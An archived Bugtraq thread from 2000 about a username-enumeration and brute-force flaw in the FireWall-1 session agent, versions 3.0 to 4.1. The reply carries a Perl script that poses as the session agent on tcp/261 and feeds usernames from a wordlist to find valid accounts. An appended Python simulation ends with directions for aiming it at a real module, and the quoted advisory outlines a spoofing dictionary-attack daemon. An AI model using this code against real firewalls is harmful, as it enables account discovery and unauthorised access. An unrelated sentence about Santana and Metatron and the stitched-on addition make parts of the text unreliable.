Bugtraq mailing list archives
Re: Firewall-1 session agent 3.0 -> 4.1, dictionary and brute force attack
From: Nelson Brito <nelson () SEKURE ORG>
Date: Fri, 18 Aug 2000 07:39:15 -0300
Try this code and let me know if it works...

PS: Just a question: if the user is right and the password wrong, will it
return an error code?!?! =)
---brute-fw1-agent.pl
#!/usr/bin/perl -w
#
# File : brute-fw1-agent.pl
# Author: Nelson Brito<nelson () secunet com br || nelson () sekure org>
#
# Untested code, use at your own risk.
#
# Fake FireWall-1 session agent: listens on tcp/261, waits for the
# firewall module to connect and send "331 User:", and answers with
# usernames from the file "users", one at a time.  "220 ... not found"
# directly followed by "530 NOTOK" means the user does not exist; a
# second "331" (the password prompt) means the username is valid.
#
use strict;
use Socket;

my $c    = 0;
my $port = 261;

socket(FAGENT, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket: $!";
setsockopt(FAGENT, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(FAGENT, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(FAGENT, SOMAXCONN) or die "listen: $!";

# Load the wordlist, skipping comments and blank lines.
my @users;
open(SDI, "users") or die "open: $!\n";
while (my $user = <SDI>) {
    chomp($user);
    next if ($user =~ /^\s*#/);
    next if ($user =~ /^\s*$/);
    push @users, $user;
}
close(SDI);
die "[-] No usernames found in file 'users'\n" unless @users;

while (accept(MODULE, FAGENT)) {
    # The firewall does not close the connection after a bad username,
    # so keep feeding candidates on the same connection until the list
    # is exhausted or a username is accepted.
    ATTEMPT: while (@users) {
        $c++;
        print STDOUT "[+] Hii... I'm on TV $c times!\n";
        my $target;
        recv(MODULE, $target, 1024, 0);
        die "[-] Unknown return code. What happened?\n"
            unless (defined $target && $target =~ /^331/i);

        send(MODULE, "$users[0]\n", 0);
        recv(MODULE, $target, 1024, 0);
        if ($target =~ /^220/) {
            # "220 User ... not found" is directly followed by "530 NOTOK";
            # both may arrive in one read, so only read again if needed.
            recv(MODULE, $target, 1024, 0) unless ($target =~ /530/);
            if ($target =~ /530/) {
                shift @users;
                next ATTEMPT;
            }
            die "[-] Unknown code. What happened?\n";
        } elsif ($target =~ /^331/) {
            print STDOUT "[+] The $users[0] username is right!\n";
            shift @users;
            last ATTEMPT;
        } else {
            die "[-] Unknown return code. What happened?\n";
        }
    }
    close(MODULE);
}
close(FAGENT);
---brute-fw1-agent.pl
gregory duchemin wrote:
hi,

Every session agent from 3.0 to 4.1 (4.1 included, all platforms) is vulnerable to a brute-force and dictionary-style password attack.

While authenticating a user through his port 261, firewall modules send a "331 User:" string to the agent, wait for an answer, and then reply with "220 User .... not found" directly followed by "530 NOTOK" if the username doesn't match the user database. If the username exists, the firewall will simply reply "331 *FireWall-1 password:" before waiting for a password value. So, the same weakness as in old versions of Unix's login: we can know whether a username exists or not.

Try #nc -l -p 261 on your workstation, then connect to an outside service that needs session authentication.

Because FireWall-1 doesn't close the connection just after a mistaken username or password submission and seems to wait indefinitely for a correct entry, it should be really efficient to mount such an attack. Usernames and passwords are up to 8 chars in length and are usually built on some logical rules (typically based on first and last names for usernames, and more generally on dictionary words). A C or Perl program with a dictionary, trying permutations on each word, should be able to quickly recover many corporate accounts. This program would be a little daemon, and would have to send a spoofed request to outside before each connection; finally, it should be able to accept a significant number of simultaneous connections to increase its chances of success.

I don't have the time to make the code right now. Just verify that your passwords are hard enough, in the same way you already did it with your Unix passwords. And for those who have a 4.1 firewall module, just use encryption.

Have a nice day

Gregory Duchemin
Sorry for my poor English!

That's all,
--
Nelson Brito - http://stderr.sekure.org/
During a meditation session, Santana said, an entity called Metatron had announced: "We want to hook you back to the radio-airwave frequency."
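The exchange Gregory describes, as an added example that is not part of either post and is not Check Point code: a Python simulation with both sides of the dialogue. A stand-in firewall module follows the 331 / "220 ... not found" + "530 NOTOK" / "331 *FireWall-1 password:" sequence quoted above and, as the post says the real one does, keeps the connection open after a bad username; an agent-side enumerator answers each prompt from a candidate list and classifies the reply. The wording of the module's lines beyond the response codes, the user database and the wordlist are constructed assumptions, and what the real module does after the password prompt is not modelled because the thread leaves that open. The reader buffers on newlines so the 220 and 530 lines are parsed correctly whether they arrive in one TCP segment or two, which a fixed-size recv() per line does not guarantee.

```python
import socket
import threading

# Constructed sample user database for the stand-in firewall module.
KNOWN_USERS = {"jsmith", "admin"}


class LineReader:
    """Newline-delimited reader over a stream socket.  The module's
    '220 User ... not found' and '530 NOTOK' lines may land in one recv()
    or be split across several; one recv() per line misparses either case."""

    def __init__(self, sock):
        self.sock = sock
        self.buf = b""

    def readline(self):
        while b"\n" not in self.buf:
            chunk = self.sock.recv(1024)
            if not chunk:          # peer closed the connection
                return None
            self.buf += chunk
        line, self.buf = self.buf.split(b"\n", 1)
        return line.decode(errors="replace").rstrip("\r")


def fake_firewall_module(conn, known_users):
    """Stand-in for the FireWall-1 module side (assumed wording beyond the
    codes).  Unknown user: 220 + 530, then prompt again on the same
    connection.  Known user: password prompt; nothing further is modelled."""
    rd = LineReader(conn)
    try:
        while True:
            conn.sendall(b"331 User:\n")
            user = rd.readline()
            if user is None:
                break
            if user in known_users:
                conn.sendall(b"331 *FireWall-1 password:\n")
                break
            # Both lines in a single segment on purpose (see LineReader).
            conn.sendall(b"220 User " + user.encode() + b" not found\n530 NOTOK\n")
    except OSError:
        pass                       # agent went away mid-dialogue
    finally:
        conn.close()


def enumerate_users(conn, queue):
    """Agent side: answer each '331 User:' prompt with the next candidate from
    `queue` (consumed in place).  Returns (valid, invalid) for this connection
    and stops at the first password prompt, i.e. the first existing username."""
    rd = LineReader(conn)
    valid, invalid = [], []
    while queue:
        prompt = rd.readline()
        if prompt is None or not prompt.startswith("331"):
            raise RuntimeError("unexpected prompt: %r" % (prompt,))
        user = queue.pop(0)
        conn.sendall(user.encode() + b"\n")
        reply = rd.readline()
        if reply is not None and reply.startswith("220"):
            status = rd.readline()
            if status is None or not status.startswith("530"):
                raise RuntimeError("expected 530 after 220, got %r" % (status,))
            invalid.append(user)
        elif reply is not None and reply.startswith("331"):
            valid.append(user)     # password prompt: the username exists
            break
        else:
            raise RuntimeError("unknown reply: %r" % (reply,))
    return valid, invalid


def run_enumeration(candidates, known_users=KNOWN_USERS):
    """Drive the attack offline: one socketpair per 'connection' from the
    module (in real life each one is triggered by a spoofed outbound request)
    until the list is exhausted.  Names over 8 characters are dropped first,
    since the post says usernames are at most 8 characters long."""
    queue = [u for u in candidates if 0 < len(u) <= 8]
    valid, invalid = [], []
    while queue:
        agent_end, module_end = socket.socketpair()
        t = threading.Thread(target=fake_firewall_module,
                             args=(module_end, known_users), daemon=True)
        t.start()
        try:
            v, i = enumerate_users(agent_end, queue)
        finally:
            agent_end.close()
        t.join()
        valid += v
        invalid += i
    return valid, invalid


if __name__ == "__main__":
    # Constructed wordlist; "administrator" is dropped by the length filter.
    found, rejected = run_enumeration(
        ["bob", "jsmith", "alice", "administrator", "admin", "carol"])
    print("valid users:", found)
    print("not found:", rejected)
```

Against a real module the agent side is the only part that changes: bind to tcp/261 as the Perl script does and hand each accepted connection to enumerate_users(), triggering a fresh outbound request whenever the module drops the connection after a password prompt.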
Current thread:
- Firewall-1 session agent 3.0 -> 4.1, dictionary and brute force attack gregory duchemin (Aug 16)
- Re: Firewall-1 session agent 3.0 -> 4.1, dictionary and brute force attack Nelson Brito (Aug 18)
